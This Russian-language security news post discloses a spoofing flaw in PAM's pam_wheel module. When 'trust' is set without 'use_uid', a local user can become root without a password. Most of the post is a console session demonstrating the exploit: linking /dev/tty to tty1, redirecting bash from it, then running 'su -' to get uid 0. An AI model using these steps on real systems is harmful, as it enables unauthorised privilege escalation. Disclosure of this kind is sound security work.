Pluggable Authentication Module (PAM) (механизм аутентификации) подвержен так называемой spoofing vulnerability. Если опция
trust включена в pam_wheel конфигурационном файле и опция
user_uid выключена, любой локальный юзер может обмануть систему и получить супер права без пароля. Вот пример,
который показывает как это сделать:

$ w
10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 7:13am 3:03m 0.30s 0.22s -bash
farmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? -
$ logname
farmer
$ ln /dev/tty tty1
$ bash < tty1
$ logname
root
$ su -
# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии